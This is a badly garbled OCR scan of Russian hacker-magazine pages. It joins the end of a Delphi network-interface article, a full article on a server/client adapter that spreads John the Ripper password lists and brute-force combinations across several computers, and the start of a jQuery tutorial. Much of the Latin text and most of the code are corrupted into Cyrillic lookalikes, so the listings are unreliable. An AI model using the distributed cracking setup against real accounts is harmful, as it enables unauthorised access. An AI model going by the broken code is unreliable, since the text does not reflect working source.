«ПЕРЕД ИСПОЛЬЗОВАНИЕМ 
ѲЕТІРТАВЬЕ НУЖНО ВЫДЕЛИТЬ 
НЕОБХОДИМУЮ ПАМЯТЬ ПОД 
СТРУКТУРУ МІВІРТАВЬЕ. ПАМЯТЬ 
ВЫДЕЛЯЕТСЯ С ПОМОЩЬЮ ИЕѴѴ» 
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несколько типов возможных сетевых интерфейсов. После выполнения фун- 
кции мы получаем числовой идентификатортипа, переварить который без 
заглядывания в руководства сможет разве что Крис Касперски. Чтобы не 
обидеть абсолютное большинство пользователей, мы используем функцию: 

СеШпДегбасеТуре (Оурез : іпДедег) : зДгіпд; 

В качестве параметра ей нужно передать идентификатортипа интер- 
фейса, а она, в свою очередь, вернет нам его символьное имя. Код 
функции ты можешьувидеть в исходнике, который дожидается тебя на 
нашем диске. 

Вернемся косновному коду программы. Обрати внимание, какя полу- 
чаю физический адрес интерфейса. Поскольку адрес хранится в масси- 
ветипа Ьуіе, нам нужно написать функцию, которая бы приводила его в 
понятный человеку вид. Чтобы это сделать, я создал еще одну функцию: 

СеДЗОгМас (Мае : ТМасАсІсІгезз ; зіге: іпДедег) : 

зДгіпд; 

В качестве параметров ей нужно передать тип ТМасАсИгевз (о нем 
я говорил в самом начале статьи, и ты должен был уже описать его в 
своем проекте) и длину физического адреса. Все данные берутся из 
заполненной структуры. Для экономии журнального места я не буду 
приводить здесь весь код программы — его ты сможешь найти на 0Ѵ0. 
Здесь я лишь вкратце расскажутебе, что в нем происходит. Первым 
делом в коде функции я делаю проверку параметра зіге. Если он равен 
нулю, то физический адрес просто отсутствует. Чтобы как-то предста- 
вить это пользователю, в качестве результата я просто возвращаю 
«00» в привычном для отображения МАС-адреса виде. Если же зіге 
не равен нулю, в цикле необходимо получать данные из массива, в 
котором хранится адрес, и с помощью функции ІпіТоНех приводить его 
к шестнадцатеричному виду и разделять символом «-». Послетого как 
разбор завершится, нужно удалить самый последний символ нашего 
результата, которым всегда будет лишнее «-». Чтобы все было красиво, 
я его удаляю и возвращаю результат. 




> Показываем информацию о доступных интерфейсах 



ОБРАБОТЧИК СОБЫТИЯ ОЫТІМЕК 

_МіЫИаЫе:РМіЫГГаЫе; 

_Р:Роіпіег; 

Ипіедег; 

_ЬиТІеп:сІ\А/огсІ; 

_еггог:сІ\А/огсІ; 

ІізА/іеѵѵІ .Ііептз.СІеаг; 
_ЬиіІеп:=зІ 2 еоі(_МіЫіТаЫе л ); 

Ыеѵѵ(_МіЫГГаЫе); 

_Р:=_МіЫГГаЫе; 

_еггог:=ОеШТаЫе(_МіЫІТаЫе, @_ЬиІІеп, Таізе); 
_еггог о І\ІО_ЕНПОР 

ЗІто\А/Меззаде('Произошла ошибка! '); 

Ехіі; 



і:=0 ТМіЫІТаЫе(_Р л ).сІ\А/МитЕп^гіез-1 
ЫзіѴіеѵѵІ.Ііетз.АсІсІ 

сарііоп:=Тгіт(ТМіЫіТаЫе(_р л ).іаЫе[і].ЬОезсг); 

зиЬііетз.Абб(ОеіІпіеі1асеТуре( 

ТМіЫІТаЫе(_Р л ).іаЫе[і].сІ\А/іуре)); 

зиЬііѳтз.АсІсІ(Оеі5ігМас( 

ТМасАсІсІгезз(ТМіЫіТаЫе(_р л ).ТаЫе[і].ЬРІтузАсІсІг), 

ТМіЫіТаЫе(_р л ).іаЫе[і].сІ\А/РІтузАсІсІгЕеп)); 

зиЬііетз.асІсІ(ЗреесІТоЗіг( 

ТМіЫіТаЫе(_р л ).іаЫе[і].сІ\А/ЗреесІ)); 

зиЬііѳтз.АсІсІ(ТгаіІ(ТМіЫІТаЫе(_р л ).іаЫѳ[і].сІ\А/ОиЮс^з)); 

зиЬііѳтз.АсІсІ(ТгаіІ(ТМіЫІТаЫе(_р л ).іаЫѳ[і].сІ\А/ІпОсіеіз)); 

зиЬііѳтз.АсІсІ(ІпіТоЗіг( 

ТМіЫіТаЫе(_р л ).іаЫе[і].сІ\А/ОиіЕггогз)); 

зиЬііетз.АсІсІ(ІпіТоЗіг(ТМіЫіТаЫе(_р л ).іаЫе[і].сІ\А/ІпЕггогз)); 



О Он сказал: «Конец» 

Наш пример готов для компиляции и жестокого тестирования. Начало 
созданию своей программы для учета трафика положено, тебе остается 
только усовершенствовать пример. После этоготы сможешь следить 
за тем, сколько драгоценного трафика ты тратишь, или даже сделать 
на основе нашего исходника свою платную программу и продавать ее 
злым буржуям за $1 9,99 в месяц. 

Если утебя что-то не заработало — не отчаивайся, а скорее вставляй 
наш ОѴО в дисковод и смотри мой исходник. Возникшие вопросы смело 
присылай мне на мыло: 5рібег_пеШіпЬох.ги. □С 
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В последнее время особую популярность приобрели различные программы-перебор- 
щики паролей с возможностью распределенной работы на нескольких компьютерах. 

К написанию этой статьи меня побудило то, что мой любимый переборщик Іоііп ТЪе 
Кіррег такой возможностью не обладает. Чтобы не реализовывать каждый раз алгоритм 
распределения в очередном самописном брутфорсере, я решил написать утилиту, позво- 
ляющую адаптировать к распределенной работе почти любую программу, и хочу поде- 
литься с тобой опытом ее написания. Итак, приступим! 



□ Конфигурация сервера 

Естественно, программа такоготипа должна 
состоять из серверной и клиентской частей. 
Давай определим возможности серверной 
части и напишем конфигуратор. Прежде всего 
назначим в конфигурационном файле основные 
настройки: 

КОНФИГУРАЦИЯ СЕРВЕРА 

[дІоЬаІ ] 

раззѵгогсЗ = сЬапдете 
сІіепДз = 5 
рогО = 31337 
Іод = асіарр . Іод 
чл/аіД = уез 
сІаДа = О 

оиДриР = гезиІР.РхР 
[дІоЬаЖ 
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СТУДЕНТ: Пукаленко Дмитрий 
УНИВЕРСИТЕТ: МГТУ им. Баумана 

КУРС: II 

ФАКУЛЬТЕТ: ИУ (информатика и системы управления) 
ТЕМА: изучение протокола ТСР/ІР 

ЦЕЛЬ ЛАБ0РАТ 0РН0Й:| написание программы-сервера, рас- 
сылающего нескольким клиентам данные из файла, вдох- 
новило нас на распределение таким образом паролей для 
переборщика Зоіт ТЬе Кіррег. Потребовалось связать про- 
грамму с клиентом, что и было сделано. Об этом и расска- 
зывается в статье. 
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Все опции в секции дІоЬаІ — основные настрой- 
ки сервера, не зависящие от набора входных 
данных. Опция сііепіз отвечаетза количество 
клиентов, которые должны быть подключены 
ксерверу, прежде чем он начнет отсылать им 
входные данные; ѵѵа И; определяет, должен ли 
сервер ждать окончания работы всех клиентов 
(в случае если мы подбираем один пароль на 
многих компьютерах), а о назначении остальных 
настроекты можешь догадаться интуитивно :). 
Остановимся на опции баіа. Так как сервер у 
нас многофункциональный, я решил вынести 
настройки преобразования входных данных 
из источника в отдельные секции конфига 
— [сіаіазеі]. Параметр баіа указывает как раз на 
то, какая секция [баіазеі] должна быть исполь- 
зована сервером. Я сделал это для того, чтобы 
можно было быстро переключать набор входных 
данных в зависимости от поставленной задачи и 
не переписывать весь конфигурационный файл. 
Самое важное в конфигурации сервера — это как раз 
та самая секция [сіаіазеі]. Она определяет источники 
данных, напримерсписокпаролей, и преобразова- 
ние данных, то есть подгонку их под спецификацию 
входных данных программы-клиента: 

[сіабазеб ] 

іприб =разз.бхб 
зкір = 

ІішіР =зутЪо1 
зутЪо1=10 
з і 2 е =0 

зепсі =10 

Ргапз =уез 

іприС_ТогшаС = : 
оиСриС_ТогтаС=%2 

епс!_с1аСа =еоб 
епс!_ѵа1ие= 

[сіабазеб ] 

Расскажу подробнее о вышеуказанных настрой- 
ках. Опция три! — путь к файлу, из которого 
будут считываться данные. Данные могут быть 



считаны и из зісііп, если значение опции будет 
пустым. Следующиетри опции предназначе- 
ны для разграничения независимых частей 
данных. Перваяуказываеттип разграничения: 
по отдельному символу или по размеру части 
данных в байтах; остальные две содержат этот 
символ или размер. В нашем случае конфигу- 
рация предусматривает разделение входного 
потока данных по строкам. Параметр зепсі — это 
разграничивающий символ между отправляе- 
мыми клиенту частями данных, у нас это 10 (\п), 
то есть отправляем также по строкам. Два 
последних параметра позволяют определить 
конец входных данных — по ЕОР или же по 
лимитированному количеству частей. Оставши- 
еся три опции отвечают за подгонку данных под 
специфический формат программы-клиента. 
Для разнообразия можешь оформить конфи- 
гурационный файл в виде ХМ В и разбирать его 
с помощью готовой библиотеки ІіЬхтІ, либо 
же юзай самописный код, как сделал я :). Код 
разбора опцийты можешь найти во врезке. 

О Подгонка данных 

Наш адаптер должен обеспечивать взаимо- 
действие с программами-клиентами любого 
типа, с различным форматом входных данных. 
Для этой цели я написал преобразующую фун- 
кцию ІгапзО, принцип работы которой заклю- 
чается в следующем. Параметр триЫюгта! 
содержит набор разделителей, записанных 
через пробел (ты можешь использовать 
любой другой символ). В зависимости от 
них считанная часть данных разделяется на 
более мелкие пронумерованные части. Мною 
была написана функция ІіпсІ, которая отсекает 
часть строки до указанной подстроки. Ее 
следует выполнять в цикле по заданным 
разделителям: 

сііаг *біпс1 (сііаг **(1аСа, 
сііаг *с!е1іт) 

{ 

сііаг *рбг, * з б г ; 
збг = (сііаг* ) саііос ( 1 , 1) ; 
бог (рбг=*сіаба; збгпстр (рбг , 
сіеііт, збгіеп (сіеііт) ) 

&& *рбг ! = ' \0 1 ;рбг++) 
асИ_зутЪо1 (&збг , рбг) ; 

(*сіаба) += збгіеп(збг) 



+ збгіеп (сіеііт) ; 
гебигп збг; 

} 

Параметр оиіриМогтаі — это просто строка, 
в которую могут быть вставлены зсапМподоб- 
ные форматные спецификаторы: %1 , %2, 

%3 ит.д. При преобразовании, вместо формат- 
ного спецификатора %п, в строку подставля- 
ется п'ая из пронумерованных частей. Такое 
нехитрое преобразование дает возможность 
подогнать формат входных данных, например, 
для многих популярных брутфорсеров. При 
реализации подобного рода алгоритмов, рабо- 
тающих со строковыми переменными, нередко 
возникает потребность динамически изменять 
строку и добавлять к ней символ или другую 
строку. В качестве примера я приведу функцию 
добавления символа: 

ѵоісі асісІ_зутЪо1 (сііаг **збг, 
сііаг *с) 

{ 

*збг = (сііаг* ) геаііос ( 

*збг , 

збгіеп ( *збг) +2 ) ; 
збгпсаб ( *збг , с, 1) ; 

} 

Ее несложно будет переписать для добавления 
к строке другой строки :). Также весьма удобна 
в использовании функция азргіпЩ), которая 
динамически выделяет память под результи- 
рующую строковую переменную. Код функции, 
заменяющей форматные спецификаторы нуж- 
ными пронумерованными частями, ты можешь 
найти во врезке или в исходнике на диске. 



> Кодинг в процессе :) 
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ЗАМЕНА ФОРМАТНЫХ СПЕЦИФИКАТОРОВ 

ѵоіб геріасе/іогтак ( с іаг **зкг , 
к, * зиЪзкг) 

{ 

іпк і I 

*пит; 

*ркг ; 

екаг *кетр; 

азргіпкк (&пит, "%сі", к); 

ѵ (ркг=*зкг; *ркг ! = ' \ 0 ' ;ркг++) 

{ 

іі ( ! зкгпстр (ркг , " %% " , 2 ) ) 
ркг++; 

і к ( *ркг== 1 % 1 && ! зкгпстр (ркг 
+ 1, пит, зкгіеп (пит) ) ) { 
і = ркг — ( *зкг ) ; 

// скопируем часть после формат- 
ного спецификатора 

*зкг = (с г*) геаііос ( (*зкг) , 
зкг1еп(*зкг) + 
зкгіеп ( зиЪзкг ) +2); 
ркг = *зкг + і; 
азргіпкк ( &кетр , "%з", 
ркг+зкгіеп (пит) +1) ; 

/ / вставим подстроку и оконча- 
тельную часть 

зкгсру(ркг, зиЪзкг); 
зкгсак(*зкг, кетр) ; 
ркг += зкгіеп ( зиЪзкг ) ; 
кгее (кетр) ; 

} 

} 

кгее (пит) ; 

} 

О Сетевая часть сервера 

Я полагаю, что сетевое взаимодействие — самая 
простая в реализации часть нашего проекта. 
Логичнее всего разбить код на три процедуры 
— ассері_сопп(), вепсЫаЫ) и деІ_ге5иЩ), 
назначение которых интуитивно понятно. Рас- 
смотрим работу вышеуказанных функций. 
Процедура ассер1;_сопп() ждет входящих под- 
ключений от клиентов. При подключении она 
получает пароль, сравнивает его с заданным 
в конфиге и помещает сокет клиента в массив 
сііепіз. При настройке мы указали фикси- 
рованное число клиентов, поэтому в случае 
возникновения ошибки (клиентдисконнектил- 
ся, неправильный пароль) в циклеуменышаем 
счетчик цикла и ждем повторного подклю- 
чения. После выполнения вышеописанной 
процедуры вызывается функция 5епб_баіа(). 

Она и является, по сути, ключевой процедурой 
в нашей программе. Для начала определяем 
входной поток и считываем из негаданные 
частями, используя методы разграничения 
частей, заданные в файле конфигурации. Если 
необходимо, применяем преобразование (в при- 
веденном примере строки вида «логиншароль» 
преобразовываются в строки, содержащие 
только пароли). После этого организуем два 
вложенных цикла: до конца входных данных и 



цикл по всем клиентам, в котором мы отправля- 
ем часть данных и разграничивающий символ 
і’тому клиенту. Такой подход позволяет серверу 
более-менее равномерно распределить данные 
между клиентами. Послетого как все данные 
отправлены, можно отключать всех клиентов и 
ждать результатов. Функция деі^гезиЩ) ожидает 
входящее подключение, проводитаутентифи- 
кацию, получает от клиента результат и, в зави- 
симости от параметра ѵѵаіі, либо прекращает 
работу, либо ожидаетзавершения работы всех 
клиентов. Теперь нам осталось собрать воедино 
модульдля разбора опций, модульдля подгонки 
данных и сетевой модуль. Сервер готов. 

О Конфигурация клиента 

Основная задача клиента — обеспечение 
взаимодействия с программой. Для начала, каки 
положено, создадим конфигурационный файл. Я, 
кпримеру, использовал в нем следующие опции: 
файл с входными данными для программы, файл 
с результатом работы, вНеІІ-командудля запуска 
программы, лог-файл, а также сетевую часть 
— хост, порти парольдля подключения ксерверу. 
Помимо этого, для удобства я вставил возмож- 
ность пропуска нескольких байт или строки в 
начале результирующего файла. Это было сделано 
по одной причине — некоторые программы, 
например _ІоЬпТНе Піррег, выводятвфайл резуль- 
тата строку с указанием количества загруженных 
паролей и используемого алгоритма шифрования. 
Клиентже будет состоять из двух основных частей: 
парсера конфигурационного файла (такого же, как 
для сервера) и сетевой части. 

□ Принцип работы клиента 

Основную работу клиента выполняютдве 
функции — деі_ба1;а() и зепсІ_ге5и11:(). Логика 
их работы проста — подключение к серверу, 
аутентификация, получение набора входных 
данных и отправка результатов. Входные дан- 
ные записываются в отдельный файл, который 
передается в качестве параметра программе. 
Далее, мы можем расширить функциональ- 
ность клиента, либо каждые п секунд проверяя 
размер файла на изменение и в случае послед- 
него отсылая новые результаты серверу, либо 
же дожидаясь окончания программы и отсылая 
серверу готовый файл (как сделал я :)). Больше 
ничего сложного в реализации клиентской 
части нет. 

□ Расширение возможностей: 
последовательный перебор 

Все прекрасно работает, ноты, скорее всего, 
спросишь: «Как быть с последовательным пе- 
ребором?» Специально для расширения воз- 



ПРИМЕРНЫЙ ПАРСЕР ОПЦИЙ КОНФИГА 

іпк дек_оркі опз ( *сопкід) { 

РІЬЕ *сопк ; 

іпк і,з= 0 ,п= 0 ,к; 

скаг кетр [500] , ѵаіие [500] ; 

/ / открываем файл конфигурации 
сопк = кореп (сопкід, "г"); 
ѵѵітііе ( ! кеок (сопк) ) { 

// обнулим кетр 
тетзек(кетр, 0, 500); 

// получаем строку из файла 
кдекз(кетр, 499, сопк) ; 

// убираем пробелы и табы 
зкгір_зрасез (кетр) ; 

// проверяем на пустую строку 
( ! зкгстр ( кетр , " " ) ) 

; 

// добавляем в список 
азргіпкк (& (оркз [п+ + ] ) , "%з" , 
кетр) ; 

} 

/ / цикл по всем строкам 
к о г (і = 0 ;і<п;і + +) { 

// проверяем на дІоЬаІ 
ік ( ! зкгстр (оркз [і] , 

" [дІоЬаІ] ") ) { 

І + + ; 

ѵ\кіі 1 е(і<п) { 

// обнулим переменные 
тетзек(кетр, 0, 500); 
тетзек (ѵаіие , 0, 500); 

// считываем параметр 
II и значение 
ког (д= 0 ; 

оркз [ і ] [ з ] ! = 1 = ' && 
оркз [і] [з ] ! = ' \ 0 1 ; з + + ) 
кетр [з ] =оркз [і] |з ] ; 
ік ( ! зкгстр (кетр, " [дІоЬаІ] " ) ) 

і++; 

ког ( к= 0 ; 

оркз [і] И] ! = ' \0 ' ; з ++) 
ѵаіие [к++] =оркз [і] [ 3 ] ; 

// проверяем параметр и значение 
і к ( ! зкгстр ( кетр , " орк іоп " ) ) 
азргіпкк (& (рагатекег) , 

" %з " , ѵаіие) ; 

і + + ; 

} 

} 

} 

геки гп 0 ; 

} 

можностей я написал дополнительную програм- 
му, генерирующую последовательность строк 
вида «логиншароль» или строк, содержащих 
лишь пароль во всех возможных комбинациях. 

В начале статьи было сказано, что сервер может 
получать входные данные нетолько из файла, но и 
из зісііп. Оставив опцию входного потока данных в 
конфиге сервера пустой, мы получим возможность 
запустить сервер следующим образом: 
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>Логработы программы 



> Выбери себе потрошителя 



г \ 




Ч У 

>На компакт-диске 
лежат полные исход- 
ные коды адаптера. 

Ты можешь скомпили- 
ровать ихс помощью 
6СС. 



# . /ЬгиДеТогсе I зегѵег 

Для расширения функциональности я использовал следующие 
опции. Опция -Іодіп Іодіп добавляетквыводимым паролям строку 
вида Іодіп:. -зіагі; и -епсі поз воля ют задать начальное и конечное 
число знаков в пароле, а -іуре (которая может приниматьзначе- 
ния аіі, сіід, Іеі) определяеттип символов, содержащихся в пароле. 
Наконец, опция -исаве позволяет использовать только пропис- 
ные латинские буквы, а -Ісазе — только строчные. Таким образом, 
чтобы сгенерировать строки вида «абтіпшароль», где пароль 
может с оде ржать толь ко строчные латинские буквы и цифры и 
имеет длину от4до ІЗсимволов, даем следующую команду: 

# . /ЬгиДеТогсе -Іодіп абтіп -зДагД 4 -епсі 13 
-Дуре аіі -Ісазе I зегѵег 

Программа ЬгіЛеІюгсе запишет в выходной поток все необхо- 
димые комбинации, которые затем будут переданы клиентам. 
Реализация Ьгиіеіюгсе очень проста. Основная функция — деп_ 
раззѵѵогсЫіпі), принимающая в качестве аргумента количество 
символов в пароле и генерирующая все пароли суказанными 
настройками. Это делается так: создается строка заданной дли- 
ны и инициализируется первым символом из заданного набора. 
В цикле мы меняем последний символ на следующий из набора 
и, в случае достижения последнего в наборе символа, меняем 
его на первый и увеличиваем предыдущий символ в строке. 

Цикл останавливается по достижении последней комбинации. 

□ Расширение возможностей: 
перебор по словарю 

Перебор с использованием файла со списком паролей тоже 
можетбыть расширен. Как известно, многие пользователи 



любят пароли — слова, записанныетранслитом или 
в другой раскладке. С помощью специальной программы, 
добавляющей ксписку паролей в ворд-листе дополнитель- 
ные значения, мы можем это учесть; взаимодействие 
программы и сервера осуществляется вышеуказанным 
методом. Преобразование паролей возможно с помощью 
создания таблиц, в которых, например, одному символу 
соответствует этот же символ в другой раскладке. 

Проверку имени пользователя как пароля, паролей 
с перепутанным регистром, паролей с повторяющимся 
словом и т.д. можно сделать интересной фичей. 
Предоставляю тебе возможность на писать та кую программу 
самостоятельно :). 

О Итог работы 

Итак, у нас получиласьутилита, способная адаптировать 
большинство популярных программ-брутфорсеров краспре- 
деленной работе на нескольких компьютерах. Вся задача по 
генерации входных данных переносится на сервер. Можно 
использовать как перебор по словарю, так и последователь- 
ный перебор. 

Естественно, программа далеко не совершенна, и многое 
еще предстоит реализовать. Интересной возможностью 
может стать отправка тестового набора данных клиентам 
и распределение последующих входных данных клиентам 
в зависимости от их производительности. Также хорошо 
было бы улучшить алгоритм преобразования входных 
данных, используя не разделители, а зсап!-подобные 
спецификаторы — %з, %і и т.д. Еще неплохо было бы 
сделать режим принудительного завершения работы всех 
программ-клиентов, если нужный парольуже найден. 
Дело за тобой : ) . □С 




>Такжеты можешь 
взять исходные коды 
адаптера с сайта 
ѵѵѵѵѵѵ. хакер ,ги . 



«У НАС ПОЛУЧИЛАСЬУТИЛИТА, СПОСОБНАЯ АДАП- 
ТИРОВАТЬ БОЛЬШИНСТВО ПОПУЛЯРНЫХ ПРО- 
ГРАММ-БРУТФОРСЕРОВ К РАСПРЕДЕЛЕННОЙ РА- 
БОТЕ НА НЕСКОЛЬКИХ КОМПЬЮТЕРАХ» 
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І БОРИ^ ОЛЬФСОнИ 

I ВОЯІ5ѴОІ.ГЗОЫ@СМАІІ..СОМ / 




НОВАЯ ВОЛНА 
^ѴАЗСВІРТ 



ОСНОВНЫЕ ВОЗМОЖНОСТИ МѴА5СКІРТ-ФРЕЙМВ0РКА ЛШЕРѴ ДЛЯ ВЕРСТКИ 



«Никогда не изобретай велосипед» — это одно из основных правил программирования 
и веб-разработки. Зачем что-то делать заново, если есть уже готовое? А если нет подхо- 
дящего целого велосипеда, можно взять от него раму (точнее, каркас) и нацепить все, 
чего не хватает. При помощи такого каркаса, или фреймворка, как говорят наши инос- 
транные друзья, работа пойдет намного быстрее и приятнее. В этой статье я расскажу о 
іаѵаЗсгіріі-фреймворке )<3иегу, который не только увеличит твою производительность, 
но и сделает программирование увлекательным. 



Оіпіго 

Раньше, когда программисты жили в пещерах 
и носили вместо одежды шкуры убитых ими 
зверей, фреймворков и библиотекдля ^ѵаЗсгір* 
не существовало. Трудные были времена, и 
немногие их пережили :]. Когда фреймворки и 
библиотеки стали появляться как грибы после 
дождя, у веб-разработчиков появился огромный 
выбор. Кнесчастью, большинство фреймворков 
— это просто ничем не выдающиеся «библиотеки 
спецэффектов». Однако существуют и достойные 



представители этого семейства, которые значи- 
тельноувеличиваютобщую эффективность рабо- 
ты веб-разработчика. Благодаря популярности 
проекта РиЬу оп Раіів очень распространился 
фреймворк Ргоіоіуре. В настоящее время все 
большую популярность приобретаетіОиегу, о ней 
и пойдет речь в сегодняшней статье. 

□ Кошерность 

Я люблю писать валидный (на языке веб-разра- 
ботчиков — «кошерный») код. Например, всегда 



стоитуказывать в начале НТМБтип документа, но в 
рамках статьи приходится этой самой валидностью 
жертвовать ради простоты и понятности, поэтому ог- 
ромная просьба кпоборникам валидаторов и прочей 
нечисти — камнями в меня при встрече не кидать :). 
Сюда же отнесем еще одну маленькую догово- 
ренность — я буду писать весь код в одном фай- 
ле для больше ясности, но любой программист 
или верстальщик скажет, что веб-странички 
надо разбивать натри файла: НТМІ_, ^ѵаЗсгірІ 
и С55. Поверь, я тоже та к считаю. 
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> Ссылки со стрелочкой 





> Выделение квадратными скобками элемента меню под 
курсором мышки 



ОНеІІо,іСІиегу! 

Больше всего я ненавижу писать культовое 
приложение всех времен и народов, которое с 
глупой улыбкой на лице приветствует окружаю- 
щий его мир :), но ничто другое не позволяеттак 
быстро понять, как работает новая технология. 
Для начала нужно скачать с официального 
сайта (или взять на диске) один файл іциегу.із, 
который весит около 18 Кб. После этого наше 
первое приложение будет выглядетьтак: 

«НЕІ-ЩѴѴОШЛЭ!» С ИСПОЛЬЗОВАНИЕМ 
ЛШЕКѴ 

НТМЦ С55, ІАѴА5СРІРТ 

<1тбт1> 

<Ъеасі> 

<зсгірб буре= " бехб/з аѵазсгірб» 
згс= " з диегу .33" ></зсгірб> 

<зсгірб буре= " б ехб /3 аѵазсгірб " > 

$ (боситепб). геасіу ( бипсбіоп ( ) { 

$ ( " а" ). сііск ( бипсбіоп ( ) { 
аіегб ( "Неііо , ѵгогісі! " ) ; 

}) ; 

}) ; 

</зсгірб> 

</Ъеас1> 

<Ьос1у> 

<а Ъ.геб = " # " >Не 11 о , ѵ\гог 1 сі!</а> 
</Ъос1у> 

</Ъ.бт1> 

Гигантский функционал этой странички заключа- 
ется втом, что при клике на ссылку нашему вни- 
манию представится окошко с надписью: «Неііо, 
ѵѵогісі!». Теперь разберемся, какэто работает. 

Для обработки событий мы используем асин- 
хронный механизм (иначе говоря, передаем в 
метод функцию, которую следует вызвать, когда 
событие произойдет). Первое событие, которое 
мы обрабатываем, — это$(боситепі).геабу. Оно 
происходит, когда до куме нт за гружен и готов 
кобработке. Очень грубо можно сравнить его 
с событием традиционного ЭаѵаЗсгірІѵѵіпсІоѵѵ. 
опіоаб. Однако $(босигшеп1;).геабу происходит 



быстрее, так как нет ожидания загрузки всех 
элементов веб-страницы, которые могутбыть не 
нужны для работы скрипта, например большие 
изображения. Что же происходите обработчике 
события? Он просто вешаетеще одну функцию- 
триггер $("а"). сііск для обработки щелчка по 
любой ссылке. А что делает функция аіегі, честно 
говоря, я незнаю :). 

Теперь посмотрим на общий шаблон для наших 
дальнейших научных изысканий: 

ШАБЛОН ВЕБ-СТРАНИЦЫ 

НТМЦ С55, ІАѴА5СРІРТ 

<Ъ.бт1> 

<ЬеасІ> 

<збу1е> 

/* Здесь идут каскадные таблицы 
стилей */ 

</збуіе> 

<зсгірб буре=" бехб/з аѵазсгірб» 
згс= " зриегу .33" ></зсгірб> 

<зсгірб буре= " бехб/з аѵазсгірб " > 

// Здесь идет наш Ц аѵаЗсгірб 
</зсгірб> 

</Ь.еаб> 

<Ьобу> 

<!— Здесь идет НТМЬ --> 

</Ьобу> 

</Ьбш1> 

Комментариями я пометил, где нужно вставлять 
тот или инойтип кода (для начинающих). На 



всякий случай уточню, что в большинстве случа- 
ев код баѵаБсгірі будет написан в конструкции: 

ШАБЛОН ДЛЯ КОНСТРУКЦИИ 
$ШОСиМЕМТ).КЕАОѴ 

МѴА5СШРТ 

<зсгірб буре= " бехб /3 аѵазсгірб " > 

$ (босшпепб ). геасіу ( бипсбіоп ( ) { 

// Здесь идет наш Ц аѵаЗсгірб 
}) ; 

</зсгірб> 

Опятьже повторюсь: С55 и баѵаЗсгірІ лучше 
вынести в отдельные файлы. 

□ІОиегудля верстальщика 

Раньше эту профессию называли «веб-ди- 
зайном», сейчасже технический прогресс и 
буржуазная мысль подарили нам эффективное 
разделениетруда: дизайнер рисует, верс- 
тальщик (обычно вместе с программистом) 
воплощает картинку вжизнь при помощи НТМЦ 
С55 и ЭаѵаЭсгірб Мы же начнем своезнакомс- 
тво сіОиегу именно с позиции верстальщика. 
Этот подход позволит нам познакомиться ближе 
с функцией $(...), про которую я намеренноумол- 
чал выше. Первым в нашем списке развлечений 
значится работа со ссылками, так что запрягаем 
коней и вперед. 

Исходной нашей задачей будет привязка к 
каждой ссылке с правой стороны небольшого 
изображения стрелочки, свидетельствующего 



> Концептуальный взгляд на іСІиегу, сточки зрения верстальщика 




ХАКЕР 04 /100/ 07 



/ 125 
















^ согііпд 




> Выделение жирным шрифтом текущего элемента меню 



> Самое первое приложение с использованием іОиегу 



отом, что текстявляется ссылкой. Такая фишка 
позволяет дополнительно указать пользовате- 
лю на ссылку в тексте страницы, и ее используют 
многие сайты, включая один из самых популяр- 
ных ресурсов интернета — «Википедию». Как 
ты думаешь, много ли кода придется писать? 
Одну строчку (точнее, целыхтри, если считать 
стандартное начало и конец): 

ЦЕПЛЯЕМ ИЗОБРАЖЕНИЕ СТРЕЛОЧКИ К 

ССЫЛКАМ 

МѴА5СШРТ 

$(с1осшпепЦ) . геасіу ( ТипсДіоп ( ) 

{ 

$ ( "а" ) . аррепсі ( "<ішд згс = ' 1іпк_ 
аггсж.рпд' />"); 

}) ; 

Про конструкцию $(сіоситепі). геасіу я уже 
рассказывал, и теперь настало время поближе 
познакомиться с функцией $(...). Это основа основ 
фреймворка іОиегу, которая по данному ей описа- 
нию находит на странице нужные элементы. Я не 
зря употребил слово «описание» — это может быть 
С55 иХРаіб, а при помощи плагинов — и другие 
дополнительные форматы. То есть конструкция 
$("а") находитсписоквсех ссылок, точнее, эле- 
ментов, которые представляютсобойтэг«а». Что- 
бы выбратьтекущий элемент, для которого проис- 
ходит обработка, надо использовать переменную 
іЬів. Методаррепб приписываетсправа строку, 
которая передается ему в параметрах. ТЬабзаІІ 
ІЫкз! Скрипт готов к работе, хотя желательно еще 
прописать С55 для изображений: 

УБИРАЕМ РАМКУ У ИЗОБРАЖЕНИЙ 

С55 

а ішд { Ьогсіег : попе ; } 



Теперь любые ссылки на нашей страничке будут 
с небольшой стрелочкой, изображение которой 
хранится в файле Ііпк_аггоѵѵ.рпд. 

Внимательный читатель наверняка скажет, 
что подобный эффект можно получить при 
помощи чистого С55, и он же может заметить, 
что на страницах«Википедии» стрелочками 
помечаются только внешние ссылки. Но ведь 
добиться этого без использования серверного 
кода посредством СЭЭуже нельзя! 

Чтобы понять, чем нам в этом деле может помочь 
ІОиегу, нужно сначала разобраться, как при помощи 
функции $(...) выбирать ссылки с определенным 
значением Ьгеб — адреса, куда эта ссылка ведет. 
Для примера рассмотрим схожую задачу с меню. 

□ Красивые менюшки 

Меню — фундаментальный элемент пользова- 
тельского интерфейса какѲІДтаки веб-при- 
ложений. На нескольких небольших примерах 
мы посмотрим, какс помощью іОиегу создать 
элемент навигации, а заодно изучим обещан- 
ные возможности функции $(...) по работе со 
свойствами элементов. 

Вертикальные меню представляют собой обыч- 
ные СПИСКИ ССЫЛОК: 

ВЕРТИКАЛЬНОЕ МЕНЮ — СПИСОК 

ССЫЛОК 

НТМІ_ 

<и1> 

<1іха ]тге^= " /шепи . Ысті " > Глав- 
наж/ах/1і> 

<1іха Ъ.ге:б= " /агкісіез . Ыіті " > 
Статьи</ах/1і> 

<1іха 1ігеб=" /богит. ЬЦтІ " > Фо- 
рум</ах/1і> 

<1іха Ъ.ге:Е= " /Ііпкз . ккті " > Ссыл- 



ки</ах/1і> 

<1іха Ьгеб= " /аЬоик . ккті " > О 
нас</ах/1і> 

</и1> 

Его можно красиво оформить через таблицы 
стилей, и мне бы очень хотелось, чтобы текущий 
раздел меню был выделенжирным шрифтом 
— это даст пользователю понять, где он сейчас 
находится. Действовать можно по-разному: либо 
на стороне сервера, либо на стороне клиента. 
Серверный скриптеще при генерации 
страницы в состоянии определить, какой 
пункт меню соответствуеттекущей страни- 
це, и прописать нужный класс у элемента 
списка. У этого варианта есть недостатки: 
придется писать систему генерации меню 
на стороне сервера, при использовании 
же готовых скриптов трудно будет модифи- 
цировать модуль по работе с меню. Кстати, 
иногда возможность написания серверных 
скриптов вообще отсутствует кактаковая. 
Второй вариантлишен вышеперечисленных 
недостатков, и реализовать мы его можем, 
написав всего одну строчку в конструкции 
$(с!оситепі:). геасіу: 

ВЫДЕЛЕНИЕ ЖИРНЫМ ШРИФТОМ ТЕКУ- 
ЩЕЙ СТРАНИЦЫ 
МѴА5СШРТ 

